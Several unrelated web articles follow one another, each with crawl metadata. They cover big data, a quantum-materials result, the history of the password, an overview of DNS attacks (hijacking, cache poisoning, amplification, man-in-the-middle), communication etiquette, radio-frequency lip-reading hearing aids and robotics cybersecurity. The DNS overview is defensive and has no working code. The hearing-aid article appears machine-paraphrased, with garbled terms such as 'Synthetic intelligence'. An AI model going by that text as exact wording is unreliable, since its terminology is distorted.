During Phase One, emerging database management systems (DBMS) gave rise to data warehousing and the first generation of data analytics applications, which employed techniques such as database queries, online analytical processing, and standard reporting tools. This first phase of big data was heavily reliant on the kind of storage, extraction, and optimization techniques that are common to Relational Database Management Systems (RDBMS).
Phase Two began in the early 2000s, fueled by the data collection and data analysis opportunities offered by the evolving internet and World Wide Web. HTTP-based web traffic generated a massive increase in semi-structured and unstructured data, requiring organizations to find new approaches and storage solutions to deal with these new information types to analyze them effectively. Companies like Yahoo, Amazon, and eBay started to draw insights from customer behavior by analyzing click-rates, IP-specific location data, and search logs. Meanwhile, the proliferation of social media platforms presented new challenges to the extraction and analysis of their unique forms of unstructured data.
Phase Three of big data is being largely driven by the spread of mobile and connected technologies. Behavioral and biometric data, together with location-based information sources such as GPS and movement tracking, are opening up new possibilities and creating fresh challenges for effective data gathering, analysis, and usage. At the same time, the sensor-based and internet-enabled devices and components of the Internet of Things (IoT) are generating zettabytes of data every day, and fueling innovations in the race to extract meaningful and valuable information from these new data sources.
In addition to the more commonly known 3 “Vs” of big data (Volume, Velocity, Variety) there are an additional 4 “Vs” that are equally as important (Variability, Veracity, Visualization, Value). The seven “Vs” summarize the concepts underlying the immense amounts of information that organizations now routinely have to deal with and illustrate why it’s necessary to capture, store, and analyze this complex resource. They are:
Volume: The amount of data available. Once expressed in megabytes (MB) or gigabytes (GB), big data volume is now typically measured in petabytes (PB), zettabytes (ZB), or even yottabytes (YB) of information. The Internet of Things (IoT) is now contributing immense amounts of data through connected technologies and smart sensors, and the volume of data in the world is projected to double every two years
Velocity: The speed with which data becomes accessible can mean the difference between success and failure. In today’s economy, data velocity has to be as close to real-time as possible to fuel analytics and instantaneous or near-instantaneous responses to market conditions.
Variety: Big data consists of structured, semi-structured, and unstructured information, with the latter category, including diverse sources such as audio, video, and SMS text messages. It’s estimated that 90% of today’s information is generated in an unstructured manner – and these different kinds of data require different types of analysis.
Variability: Differences in perception and relevance can give the same data set a different meaning when viewed from different perspectives. This variability requires big data algorithms to understand the context and decode the exact meaning of every record in its specific environment.
Veracity: This refers to the reliability and accuracy of the information available. Besides allowing for greater utilization due to their higher quality, data sets with high veracity are particularly important to organizations whose business centers on information interpretation, usage, and analysis.
Visualization: Any data that’s collected and analyzed has to be understandable and easy to read if it’s to be of any use to all stakeholders in an organization. Visualization of data through charts, graphs, and other media makes information more accessible and comprehensible.
Value: This is a measure of the return resulting from data management or analysis. Handling big data requires a considerable investment in time, energy, and resources – but if it’s done properly, the resulting value can yield considerable profit and competitive advantages for the enterprise.
Examples of data usage in the media and entertainment industries abound – ranging from the digitization and repackaging of content for different platforms, to the collection and analysis of viewing figures, audience behavior characteristics, and feedback, to informing decisions concerning program content, scheduling, and promotion. Big data is contributing to a media and entertainment market that analysts predict will generate an estimated $2.2 trillion in revenue in 2021.
Predictive analytics and demand forecasting are data analytics examples that enable Amazon and other retailers to accurately predict what consumers are likely to purchase in the future, based on indicators from their past buying behavior, market fluctuations, and other factors. For instance, retailers like Walmart and Walgreens regularly analyze changes in the weather to detect patterns in product demand.
These big data examples rely on drawing inferences from past and current observations to predict or prescribe courses of action for the future. But some examples of big data usage are rooted very much in the management of ongoing events. In product recalls, for example, the data helps retailers and manufacturers identify who purchased a product, and allows them to reach out to the affected parties.
Diagnostics, predictive medicine, and population health management are some of the big data examples in healthcare. Expansive databases and data analytics tools are empowering healthcare institutions to provide better clinical support, at-risk patient population management, and cost-of-care measurement. Insights from analytics can enable care providers to pinpoint how variations among patients and treatments will influence health outcomes.
With the cost of genome sequencing coming down, analysis of genomics data is enabling healthcare providers to more accurately predict how illnesses like cancer will progress. At the institutional level, some big data systems are able to collect information from revenue cycle software and billing systems to aggregate cost-related data and identify areas for cost reduction.
Examples of big data in computer applications include the “maps to apps” approach that’s transforming the nature of transportation planning and navigation. Big data collected from government agencies, satellite images, traffic patterns, agents, and other sources can be incorporated into software and platforms that put the latest travel information in the palm of your hand, as mobile apps and portals.
General Electric’s Flight Efficiency Services, recently adopted by Southwest Airlines and used by other airlines worldwide, is a big data example that’s assisting air carriers in optimizing their fuel usage and planning for safety by analyzing the massive volumes of data that airplanes generate.
Big data analytics examples extend to all sectors of the economy. Skupos, a PC-based platform that pulls transaction data from 7,000 convenience stores nationwide, is an example of big data at work in the retail industry. Each year, billions of transactions studied using the platform’s business analytics tools are made available to store owners, enabling them to determine location-by-location bestsellers and set up predictive ordering.
The Salesforce customer relationship management (CRM) platform integrates data from various aspects of a business, such as marketing, sales, and services, pulling the information into a comprehensive, single-screen overview. The platform’s Einstein Analytics feature automatically provides insights and predictions on metrics like sales and customer churn, using Artificial Intelligence. Salesforce is one of the big data marketing examples which enables users to connect and integrate with outside data management tools.
A number of big data concepts surround the treatment and analysis of the diverse range of structured, semi-structured, and unstructured information sources contributing to the estimated 1.7 MB of data created by each person on the planet in each second of 2020.
All data must go through a process called extract, transform, load (ETL) before it can be analyzed. Here, data is harvested, formatted to make it readable by an application, then stored for use. The ETL process varies for each type of data.
For structured data, the ETL process stores the finished product in a data warehouse, whose database applications are highly structured and filtered for specific analytics purposes. In the case of unstructured data, the raw format of the data and all of the information it holds are preserved in data lakes.
Since the compute, storage, and networking requirements for working with large data sets are beyond the limits of a single computer, big data tools must process information through clusters of computers in a distributed manner. Products like Hadoop are built with extensive networks of data clusters and servers, allowing big data to be stored and analyzed on a massive scale.
Particularly when dealing with unstructured and semi-structured information, the “What is big data?” concept must also take context into account. So, for example, if a query on an unstructured data set yields the number 31, some form of context must be applied to determine whether this is the number of days in a month, an identification tag, or the number of items sold this morning. Merging internal data with external context makes it more meaningful and leads to more accurate data modeling and analysis.
As we’ve already observed, there are three main types of big data: structured, semi-structured, and unstructured.
Structured data is highly organized, easy to define, and work with, having dimensions that are defined by set parameters. This is the kind of information that can be represented by spreadsheets or tabular relational database management systems having rows and columns.
Structured data follows schemas, which define the conditions and paths leading to specific data points. For example, the schema for a payroll database will layout employee identification information, pay rates, number of hours worked, and how payment is delivered. The schema defines each one of these dimensions, for whatever application is using the database.
It’s reckoned that no more than 20% of all data is structured.
Unstructured data is more free-form and less quantifiable, like the kind of information contained in emails, videos, and text documents. More sophisticated techniques must be applied to this type of big data before it becomes accessible to systems and analysts who can yield useful insights. This often involves translating it into some form of structured data.
Unstructured data that’s associated with metadata (information about information, such as timestamps or device IDs) is known as semi-structured. Often, while the actual content of the big data (the characters making up an email message, or the pixels in an image, for example) is not structured, there are components that allow the data to be grouped, based on certain characteristics.
Among the principal benefits of big data for organizations is its potential to improve operational efficiency and reduce costs. This may be due to analytical techniques which identify ways of streamlining or optimizing processes, or predictive or prescriptive analysis that reveals possible problems in time to mitigate or avoid them entirely, or plots courses of action that aid decision-makers in improving business methods and operations.
For commercial organizations, big data analytics using AI and machine learning technologies aids in understanding consumers, improving fulfillment options for product and service delivery, and in crafting and maintaining personalized customer experiences across multiple platforms. These methods help organizations bolster their sales and marketing operations, customer acquisition, and customer retention.
As well as identifying potential risks to the enterprise, big data analytics also provides an avenue for innovation by establishing opportunities to develop new products and services to fill existing gaps or niches in the market.
Other big data benefits include supply chain optimization, with data analytics making high-level collaboration between the members of a supplier network possible. This can not only lead to improved logistics and distribution but also open opportunities for innovation and joint ventures between stakeholders in the supply chain.
Automation is expected to play a huge role in the future of data analytics, with intelligent and pre-programmed solutions enabling organizations to streamline and simplify the analytics process. Augmented analytics will be one of the facilitating mechanisms for this by integrating machine learning and natural language processing into data analytics and business intelligence.
Augmented analytics can scrub raw data to identify valuable records for analysis, automating certain parts of the process and making the data preparation process easier for data scientists, who habitually spend around 80% of their time cleaning and preparing data for analysis using traditional methods. This will free up more time for data scientists to spend on strategic tasks and special projects.
Relationship analytics is also set to play a part in the big data future by empowering organizations to make connections between disparate data sources that would appear to have no common ground on the surface. Relationship analytics uses several techniques to transform data collection and analysis methods, allowing businesses to optimize several functions at once.
By bringing together social science, managerial science, and data science into a single field, decision intelligence will put a more human spin on the future of business analytics by using social science to understand the relationships between variables better. Decision intelligence draws from different disciplines such as business, economics, sociology, neuropsychology, and education to optimize the decision-making process.
As IoT devices become more widespread in critical applications, data analysts will expect platforms to generate insights in as close to real-time as possible. Continuous analytics will help accomplish this by studying streaming data, shortening the window for data capture and analysis. By combining big data development, DevOps, and continuous integration, this methodology also provides proactive alerts to end-users or continuous real-time updates.
Machine learning technology is facilitating the augmentation and streamlining of data profiling, modeling, enrichment, data cataloging, and metadata development, making data preparation processes more flexible. This augmented data preparation and discovery automatically adapts fresh data, especially outlier variables, and augmented discovery machine learning algorithms allow data analysts to visualize and narrate their findings more easily.
Predictive and prescriptive analytics are charting a course for the future of big data, in which organizations will be able to improve efficiencies and optimize performance by providing information not only on what will happen in a particular circumstance, but how it could happen better if you perform actions X, Y, or Z. In this field, AI and machine learning are already automating processes to assist businesses with guided marketing, guided selling, and guided pricing.
Looking at the future of data itself, the majority of big data experts agree that the amount of information available will continue to grow exponentially, with some estimates predicting that the global data store will reach 175 zettabytes by 2025. This will be largely due to increasing numbers of transactions and interactions on the internet, and the proliferation of connected technologies.
In response to this, organizations are expected to migrate more of their big data load to the cloud, in mainly hybrid or multi-cloud deployments. As legislative frameworks continue to evolve and adapt to changing circumstances, data privacy and governance will remain high on the agenda for both governments and individual citizens.
The growing big data landscape will also require solutions to the ongoing skills shortage, which is increasing the demand for data scientists, artificial intelligence engineers, Chief Data Officers (CDOs), and other professionals with the relevant skills for managing and manipulating big data.
Big data is huge volumes of information whose random nature only makes it possible to manage and analyze using specialist techniques and technology. Data sets can run to petabytes or more in size. | <urn:uuid:827b3898-e0fb-471b-8574-058dc7e52c57> | CC-MAIN-2022-40 | https://itchronicles.com/what-is-big-data/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337244.17/warc/CC-MAIN-20221002021540-20221002051540-00593.warc.gz | en | 0.915346 | 4,280 | 3.53125 | 4 |
A Surprising Quantum Effect Observed In a “Large” Object
(ACTU) While working on the resistivity of a type of delafossite – PdCoO2 – researchers at EPFL’s Laboratory of Quantum Materials discovered that the electrons in their sample did not behave entirely as expected. When a magnetic field was applied, the electrons retained signatures of their wave-like nature, which could be observed even under relatively high temperature conditions and appeared in relatively large sizes. These surprising results, obtained in collaboration with several research institutions*, could prove useful, for example in the quest for quantum computing.
Philip Moll, who heads EPFL’s Laboratory of Quantum Materials. “It’s the very first time this quantum effect has been observed in such a large piece of metal. 12 micrometers may seem small, but for the dimensions of an atom, it is gigantic. This is the length scale of biological life, such as algae and bacteria.”
The next step will be to try and better understand how this phenomenon is possible at this scale. But researchers are already imagining a wealth of possibilities, particularly in the field of quantum computing. | <urn:uuid:026f311c-e933-402a-a00f-ae298237a3f7> | CC-MAIN-2022-40 | https://www.insidequantumtechnology.com/news-archive/a-surprising-quantum-effect-observed-in-a-large-object/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337415.12/warc/CC-MAIN-20221003101805-20221003131805-00593.warc.gz | en | 0.95195 | 243 | 2.96875 | 3 |
Massachusetts Institute of Technology (MIT) announced that Fernando Corbato, a pioneer in computer security, has passed away aged 93.
Corbato’s death, though it is sad news, provides an opportunity to reflect on the importance of his work, and specifically on one of his revolutionary ideas: the password.
That’s right, he invented the password. While managing and remembering passwords has evolved from scribbling on scraps of paper to selecting from among the best password manager software on the market at any given time, the idea is so common that it seems incredible that anyone would have to invent it. But every technology has to start somewhere and the humble password, now used for everything from your email account to cloud security, started at MIT in the 1950s.
Securing multi-user systems
Dr. Corbato spent his entire career at MIT. He originally joined the physics department to study for a doctorate in condensed matter physics, but (luckily for us) soon got distracted by the machines he was using to perform his calculations.
The faculty at MIT was already using computers by 1950, but they were labor-intensive devices. This was partly because the monolithic machines could only work on one problem at a time. This meant that there was always a huge queue of jobs waiting to be processed, and a lot of processing time was lost.
Dr. Corbato’s solution was to develop an operating system called the Compatible Time-Sharing System (CTSS). This allowed large processing tasks to be broken into smaller components, and for the computer to give small slices of time to each task.
Even with the primitive computers that Dr. Corbato was working on in the 1950s, computations were so fast that none of the researchers would realize that they were only using a portion of the available processing time.
CTSS did create a problem, though. With multiple users sharing one computer, files had to be assigned to individual researchers, and available only to them. This was what led Dr. Corbato to develop the password system. In a system now familiar to everyone, every user was given a unique name and password, and their files stored in a way that they were available only to one user.
“Putting a password on for each individual user as a lock seemed like a very straightforward solution,” Dr. Corbato told Wired during an interview in 2012.
The rise of the password
CTSS was a groundbreaking advance, and it didn’t take long before the system had a huge influence. It led directly to the development (also at MIT) of Multics, another multi-user system that relied on passwords to secure files. Multics, in turn, formed the basis for the Linux operating system that is common today.
The influence of Corbato’s work was such that the password system was quickly adopted in almost every field of computer design. When the Internet was first invented at CERN, for instance, it seemed completely natural to use passwords to grant researchers access to computing resources. After the development of the PC in the 1980s, the password became an important part of business life, and eventually everyday life.
Today, though, some are questioning whether the password is really the best way of protecting personal data in our interconnected world. Though the concept itself is sound, there is a huge problem with the way that we use it: too many people use simple, short passwords that are easy to guess. Initiatives such as World Password Day have sought to raise awareness of this, but the problem remains.
Are passwords obsolete?
These problems have led to the development of systems that don’t rely on passwords in order to secure user data. Fingerprint, face recognition and other biometrics are slowly becoming common, even in consumer devices. But the truth is that the password is not likely to disappear any time soon.
The reason is simple: advanced technologies like face and fingerprint recognition are currently too expensive to implement on everyday systems and come with their own host of issues, too. Though certain high-value systems (like Internet banking or corporate intranets) have not relied on passwords for years, it’s unlikely that you’ll need a fingerprint to log into your WordPress account for some years to come. That’s not to say, though, that you shouldn’t secure your WordPress site as much as you can and check regularly for breaches and other infiltrations of your data.
One of the biggest problems with people and their passwords is that they use the same one for, say, their Pinterest account and their Internet banking. That’s a really bad idea – if one is hacked the other is compromised as well. Not surprisingly, password ‘crossover’ was one of the leading causes of damaged brand reputation in 2019.
So while we’ll have to accept that passwords are still with us for a while, we can also improve the way we work with them thanks to password management software innovations. The aforementioned password managers help you generate long, secure, unique passwords for every site (and account) you have, and keep track of all of them for you. There are many password managers that can help you create secure passwords for each account.
It’s important to choose a password manager that fits your needs. Perhaps you prefer to use your desktop for online accounts, then it is important to choose a manager that offers a desktop app, like Dashlane, or perhaps you are looking to also pair it with secure file storage. Whatever your needs, be sure to review each password manager’s features to choose the best one for your situation.
Tech companies are also seeking to improve the security of passwords through new standards like FIDO2, which builds on existing technology rather than trying to re-invent the wheel.
The bottom line
Looking back at the past 70 years, it’s tempting to say that the work of Dr. Corbato has been too influential. Here’s why. Though the password has helped to keep all of our IT systems secure over that time, it’s now such a common feature of everyday life that we forget how important passwords are in keeping us safe online. It can sometimes feel like we need a password for everything, and that’s why we sometimes get lazy, and use short passwords, or re-use the same password for multiple systems.
Not that this is Dr. Corbato’s fault, of course. His invention has been the most reliable way to keep data safe since the 1950s, and will no doubt form the basis for whatever comes next. As Prof Fadel Adib, from the Media Lab at MIT, said in his tribute, “our world would be very different without his research and that of his descendants. He inspires in his work and his legacy.” | <urn:uuid:1e751d1a-4c40-49e4-a926-6e79f4e5cf87> | CC-MAIN-2022-40 | https://www.crayondata.com/how-forgotten-physicist-shaped-internet-access-today/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338073.68/warc/CC-MAIN-20221007112411-20221007142411-00593.warc.gz | en | 0.976704 | 1,414 | 3.28125 | 3 |
Domain Name Services (DNS) is too important to do without, but it’s difficult to defend. This makes DNS services an excellent target for attack. Taking out an organization’s DNS service renders it unreachable to the rest of the world except by IP address. If "f5.com" failed to be published online, every single Internet site and service we ran would be invisible. This means web servers, VPNs, mail services—everything.
Even worse, if hackers could change the DNS records, they could then redirect everyone to sites they controlled. Since DNS is built upon cooperation between millions of servers and clients over insecure and unreliable protocols, it is uniquely vulnerable to disruption, subversion, and hijacking. Here’s a quick rundown of the known major DNS attacks.
Denial of Service
Denial-of-service attacks are not limited to DNS, but taking out DNS decapitates an organization. Why bother flooding thousands of web sites when killing a single service does it all for you? The most famous DoS attack against DNS are the recent Dyn DDoS attacks which exceeded 40 gigabytes of noise blared at their DNS services. Dyn was running DNS services for many major organizations, so when they were drowned by a flood of illegitmate packets, so were companies like Amazon, Reddit, FiveThirtyEight, and Visa.
DNS can also be subverted for use as a denial-of-service weapon against other sites by way of DNS Amplification/Reflection. This works because DNS almost always returns a larger set of data than what it was queried. Since DNS runs over UDP, it’s a simple matter for attackers to craft fake packets spoofing a query source, so if they can fake thousands of queries from the victim’s IP address whose amplified responses will overwhelm the victim.
Who owns what domain name, and what DNS servers are designated to answer queries are both managed by Domain Registrars. These are commercial services, such as GoDaddy, eNom, and Network Solutions Inc., where there are registered accounts controlling pointers to DNS servers. If attackers can hack those accounts, they can repoint a domain to a DNS server they control. This is how a Brazilian Internet banking site was completely taken over for hours.
DNS Server Vulnerabilities
Because DNS services are software, they can contain bugs that attackers can exploit. Luckily, DNS is old (so we’ve had time to find most of the bugs) and simple (so bugs are easy to spot), but problems have cropped up. In 2015, there was a rather significant hole found in BIND, an open-source DNS server running much of the Internet. Called CVE-2015-5477 (no cute name, thank you), BIND allowed an attacker to crash a DNS server with a single crafted query.
Another software vulnerability in DNS servers is the recursive DNS spoof cache poisoning technique, which means that an attacker can temporarily change DNS database entries by issuing specifically crafted queries.
Unauthorized DNS Changes
If you’ve got a server, someone must manage it. That means that you are dependent on how strongly you are authenticating the admins to that server, as well as ensuring the trustworthiness and competence of those admins. Because of the nature of DNS records, changes to DNS are cached by query clients; bad entries can sometimes take hours or days to unwind across the Internet.
DNS Data Leakage
You can’t run an unauthenticated Internet database full of important information without the occasional risk of leaking out something important. Attackers will query DNS servers looking for interesting Internet services that may not be widely known. DNS records can also aid phishing expeditions by using known server names in their phony baloney emails.
Many organizations run DNS on the inside of the network, advertising local resources for workstations. Some smaller organizations run split-horizon DNS servers that both DNS services to the world, as well as the inside network. A wrong configuration on that DNS server can lead to some devastating DNS data leakages as internal names and addresses are shared with attackers.
The easily spoofed protocol UDP that DNS uses is a weak link. An attacker inline between the victim and the DNS server they’re querying can intercept and monkey with DNS queries. It’s a pretty easy attack to pull off if you’re on the same wire or wireless as the victim or DNS server. An F5 researcher found a way to use it to steal Microsoft Outlook credentials. So, it’s an attack that shouldn’t be taken lightly.
Bottom line: We are stuck with DNS, so better make sure it’s reliable and incorruptible. The future of the Internet depends on it. | <urn:uuid:d48d1e2e-cb5f-4baa-9359-1ec01af203f0> | CC-MAIN-2022-40 | https://www.darkreading.com/f5/dns-is-still-the-achilles-heel-of-the-internet | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334579.46/warc/CC-MAIN-20220925132046-20220925162046-00793.warc.gz | en | 0.9447 | 995 | 2.609375 | 3 |
Communication can be a real challenge; working across cultures, backgrounds, experiences, and perspectives can result in different interpretations — and this is under the best of circumstances. However, when it’s written communication, the challenge is multiplied due to the lack of feedback cues from facial expressions, body language, and the like. These challenges make it exceedingly easy to create a situation where what a person hears is entirely different from what the speaker (or writer) intended.
These disconnects can create many negative impacts & make productive communication impossible. When communicating as a professional, there are a number of things to keep in mind, a few of which I’ve collected here.
What you intend is effectively irrelevant when communicating with others; it’s their perception that matters, as that’s what they will act on. For example, you may intend to be supportive, and it could instead be seen as patronizing. You may intend to say something that spurs conversation and instead shut it down. Perhaps you intend to take a strong position on something you care about, but in the process, you come across as a bully. These perceptual mismatches are all too easy to create through less than ideal communication, and, likely, we’ve all confused our listeners many times by making mistakes like these. When a person reacts to your communication, they can only infer your intent - and it can be drastically different than your actual intent.
Just because the intent was good doesn’t mean that the result will be; philosophy has an entire school of thought about this, consequentialism. In consequentialism, one’s intent isn’t considered when determining if an act (or lack of action) is right or wrong. Only the result it produces is considered. If you do something with the honest intention to do good, but it works out to cause more harm than good, then the action was wrong. While consequentialism is about morals, it also works for communication. How a person perceives what you have to say matters, not the intent in your mind while saying it.
With so much that can go wrong, we must be diligent in placing ourselves in the recipient’s shoes — try to do our best to see how something would be perceived, and adjust as needed to minimize the risk of them coming away with a different meaning. Of course, it’s impossible to get this correct 100% of the time, but it is possible to try 100% of the time.
Words have meanings, often more than one, and sometimes different meanings to different groups. What may seem innocent to one group, may be insulting or demeaning to another. What may be a minor expression of opinion to one, maybe inflammatory or aggressive to another. Thus, our choice of words is critical to ensuring that our communications achieve our intent, instead of leaving the meaning up to the ambiguity of inference, or worse, creating a perception entirely at odds with the original purpose.
The use of inflammatory terminology, calling an entity evil, for example, can send discourse into dangerous territory and lead to people feeling attacked or bullied. It can lead to shutting down a conversation or leave it spiraling out of control, becoming ever more problematic. If you find yourself using any of the following, you should likely reconsider your word choice.
- Always, Never, Everyone, No-one, Best, Worst - This is a sign of oversimplification and generalization.
- Overstatements & Exaggerations - Statements should be fact-based, clear, and accurate.
- Extreme Words - The use of words that evoke extremes (evil, obnoxious, devil, etc.) set the stage for hostility and degradation of discourse.
- Name Calling - While one wouldn’t generally do this in a professional context, it happens more often than it should, especially when referring to external entities. This is another dangerous territory, and can have particularly harmful effects even when the target isn’t part of the conversation.
- Implications - It is easy to make assumptions about the feelings and positions of the recipient, and imply certain things without directly stating them. This can lead to varying understandings, and even outright wrong interpretations when those assumptions are incorrect.
- Omissions - By omitting details, such as other facts, different opinions, mitigating factors, and the like, it’s possible to create an inaccurate view, and create a variety of interpretations among those with portions of the missing information.
- Facts vs. Opinions - There are places and times that opinions are perfectly appropriate, but they need to be expressed as what they are, opinions. Care should be taken to avoid a listener (or reader) confusing opinion for fact. This is particularly important for professional opinions versus personal opinions; my personal opinion of something may be quite different from my professional opinion of the same thing. Professional opinions are held to a higher standard and are more influential; as such, it’s vital that they not be mixed.
Sexist language, racist, homophobic, transphobic, and so many other categories should be avoided at all costs, even when quoting another source. There are many types of exclusionary and offensive language, all of which are harmful regardless of who the intended target is, or if the intended target ever hears it. Generally speaking, if you have to ask if it could be offensive, it’s best to look for other options (or completely reevaluate what you are saying).
As the speaker, the onus is on you to understand what a statement means and how different people could understand it. At times, people will use a term that they believe to be innocent, but is problematic. While the intent isn’t to offend, it doesn’t make the use of such a term less offensive. This requires a conscious effort to understand different groups and how they use terminology, soliciting and listening to feedback. A constant process of education to ensure that your understanding of a term is accurate and not offensive.
This requires self-awareness, sensitivity to others, and the willingness to invest in being a better and more effective communicator. Not everyone does this naturally; for some, this is a more significant and more conscious effort, though it’s an effort that is necessary.
Given that perception is the reality to the listener, it’s imperative to make this investment and clearly understand every word and its various meanings.
Professional and respectful discourse should be encouraged; this means being open to contrary views, opinions, and perspectives. Unfortunately, it’s all too easy to shut down a conversation through poorly considered communication, leaving others involved with no desire to continuing to engage. Even worse, it can create an environment where ideas and opinions are withheld out of fear of the response. When the door for respectful and honest communication is closed, it comes at a cost — great ideas that are never considered, new perspectives that go unheard, useful information goes unshared, and the potential for adversarial relationships to develop.
There’s no expectation for everyone to always agree, but everyone deserves to be heard, and have their thoughts and ideas fairly considered. This is impossible when they are reluctant to share them because of poor and ineffective communication styles. Progress isn’t made when ideas are suppressed; success isn’t achieved when thoughts are held up by fear.
Discourse should be open, honest, and respectful. Anything less than this is an error that should be addressed as quickly as possible, lest a culture of fear and isolation develop.
Every person, regardless of innate trait or choice, deserves to be treated with respect, deserves to be heard, deserves to work without fear, or degradation, or condescension, or a thousand other things that place barriers, restrictions, limits, or otherwise hold them back from being their best. There’s never a valid reason for being disrespectful in professional communication or a professional environment (or, frankly, in any communication or environment).
Think about how the people you are communicating with will feel, what they will think, how your words will impact them. Try to understand the world from their perspective and consider your words in that light; this can often expose issues that would otherwise be missed; empathy is crucial to good communication. Coming to a conversation from a point of empathy allows you to understand issues and challenges easier, will enable you to find better solutions, and more quickly come to a shared understanding. If you engage without empathy, without understanding the other parties, you are not only working with woefully incomplete information, you are allowing your own biases and opinions to color the discussion. This likely means you are missing crucial points that could be addressed if you were working with a better understanding, and more open to their perspective.
It is your duty, no matter your role, to treat everyone with respect, including hearing them (not just letting them speak) and engaging in a good-faith manner. Nothing less than that should be accepted.
Allowing a person to speak is a simple and inactive task; hearing them, on the other hand, is an active task that requires several things:
- Paying attention to what they are saying and how.
- Understanding their perspective, challenges, and issues.
- Setting aside your biases and preconceived notions so that you can empathize and actually understand them.
- Reserving judgement until you are fully informed, instead of making decisions or forming positions based on incomplete information.
If you don’t make an effort to actually hear a person, you are doing them and everyone else a disservice, and you are not truly engaged; if you are in a conversation just to support your own views and opinions, you are almost certainly speaking without adequate insight to form a meaningful position. Thus, you’re doing more harm than good. While you may still come to a position that disagrees with others you are communicating with, this position should be born of careful consideration of all relevant information, not just the information you came into it with.
Take time to think about what you say, how others will feel, and you’ll be able to engage at a more meaningful level. This does require effort, but it’s a worthy investment, and you owe it to those you work with. These more meaningful conversations lead to better results, better ideas, better solutions, better relationships, and a better environment.
Everyone deserves respect, and it should be demonstrated in how you communicate. | <urn:uuid:17f11b03-31dd-4cf0-a0cf-7157b3ec9bba> | CC-MAIN-2022-40 | https://adamcaudill.com/2021/09/24/communicating-with-respect/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334942.88/warc/CC-MAIN-20220926211042-20220927001042-00793.warc.gz | en | 0.945647 | 2,139 | 2.5625 | 3 |
A brand new system able to studying lips with exceptional accuracy even when audio system are sporting face masks may assist create a brand new era of listening to aids.
A global crew of engineers and computing scientists developed the expertise, which pairs radio-frequency sensing with Synthetic intelligence for the primary time to establish lip actions.
The system, when built-in with typical listening to support expertise, may assist sort out the “cocktail celebration impact,” a standard shortcoming of conventional listening to aids.
Presently, listening to aids help hearing-impaired folks by amplifying all ambient sounds round them, which will be useful in lots of facets of on a regular basis life.
Nevertheless, in noisy conditions resembling cocktail events, listening to aids’ broad spectrum of amplification could make it troublesome for customers to concentrate on particular sounds, like a dialog with a specific individual.
One potential answer to the cocktail celebration impact is to make “sensible” listening to aids, which mix typical audio amplification with a second system to gather further information for improved efficiency.
Whereas different researchers have had success in utilizing cameras to help with lip studying, accumulating video footage of individuals with out their specific consent raises considerations for particular person privateness. Cameras are additionally unable to learn lips by means of masks, an on a regular basis problem for individuals who put on face coverings for cultural or spiritual functions and a broader difficulty within the age of COVID-19.
The College of Glasgow-led crew outlined how they got down to harness cutting-edge sensing expertise to learn lips. Their system preserves privateness by accumulating solely radio-frequency information, with no accompanying video footage.
To develop the system, the researchers requested female and male volunteers to repeat the 5 vowel sounds (A, E, I, O, and U) first whereas unmasked after which whereas sporting a surgical masks.
Because the volunteers repeated the vowel sounds, their faces have been scanned utilizing radio-frequency indicators from each a devoted radar sensor and a wifi transmitter. Their faces have been additionally scanned whereas their lips remained nonetheless.
Then, the three,600 samples of information collected through the scans have been used to “educate” machine studying and deep studying algorithms how you can acknowledge the attribute lip and mouth actions related to every vowel sound.
As a result of the radio-frequency indicators can simply go by means of the volunteers’ masks, the algorithms may additionally be taught to learn masked customers’ vowel formation.
The system proved to be able to accurately studying the volunteers’ lips more often than not. Wifi information was accurately interpreted by the training algorithms as much as 95% of the time for unmasked lips, and 80% for masked. In the meantime, the radar information was interpreted accurately as much as 91% with no masks, and 83% of the time with a masks.
Dr. Qammer Abbasi, of the College of Glasgow’s James Watt College of Engineering, is the paper’s lead writer. He mentioned, “Round 5% of the world’s inhabitants—about 430 million folks—have some type of listening to impairment.
“Listening to aids have offered transformative advantages for a lot of hearing-impaired folks. A brand new era of expertise which collects a large spectrum of information to enhance and improve the amplification of sound might be one other main step in enhancing hearing-impaired folks’s high quality of life.
“With this analysis, we have now proven that radio-frequency indicators can be utilized to precisely learn vowel sounds on folks’s lips, even when their mouths are lined. Whereas the outcomes of lip-reading with radar indicators are barely extra correct, the Wi-Fi indicators additionally demonstrated spectacular accuracy.
“Given the ubiquity and affordability of Wi-Fi applied sciences, the outcomes are extremely encouraging which means that this method has worth each as a standalone expertise and as a element in future multimodal listening to aids.”
Professor Muhammad Imran, head of the College of Glasgow’s Communications, Sensing and Imaging analysis group and a co-author of the paper, added, “This expertise is an final result from two analysis initiatives funded by the Engineering and Bodily Sciences Analysis Council (EPSRC), known as COG-MHEAR and QUEST.
“Each purpose to seek out new strategies of making the following era of well being care units, and this improvement will play a serious position in supporting that purpose.” | <urn:uuid:0a07f449-6802-4084-9350-3a345a7e5bce> | CC-MAIN-2022-40 | https://blingeach.com/a-new-technology-of-listening-to-aids/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334942.88/warc/CC-MAIN-20220926211042-20220927001042-00793.warc.gz | en | 0.935469 | 932 | 3.015625 | 3 |
Cybersecurity poses a serious threat to the Industrial Internet of Things (IIoT) enabled devices and robotic automation equipment. Attackers who gain access to industrial networks have a number of devastating options available to them, from changing production data to causing harmful production errors.
Cybersecurity in the robotics field is still immature, but manufacturers are starting to realize the vulnerability that connected robots and automation equipment creates in their operations. For those seeking to beef up their cybersecurity and protect their business, there are a number of options available to them.
When it comes to cybersecurity, there’s no single “fence” that can be placed around all systems for full protection. Over the years, attackers have found ways to get around these barriers and will continue to do so. A hallmark of cybersecurity best practice lies in creating depth in IIoT architecture to discourage attacks.
Essentially, creating multilayered and multidimensional IIoT architectures means that attackers would have to break through many different levels in order to access anything of value. The time and difficulty of doing so is the primary deterrent – breaking into a deeply layered system is incredibly complex.
Companies also should be building cybersecurity protocols into each layer of the IIoT architecture for greater protection. For example, there are many components to a robotic system that could be protected for a defense-in-depth strategy. There’s the embedded operating system within the robot, as well as the application code that runs on the robot. There’s a wealth of communications code that processes commands to the robot. The robot will likely be connected to various PC-based systems, which may or may not have databases on them, including cloud servers or software that communicates to the robots and users over a web interface.
IIoT architectures, such as the one described above, may already be complex in nature, but still in need of protection at every layer of the system.
Cybersecurity standards for robotic automation
There are a number of standards, recently developed by the International Electrotechnical Commission (IEC) and the International Society of Automation (ISA), that govern security for Industrial Automation and Control Systems (IACS).
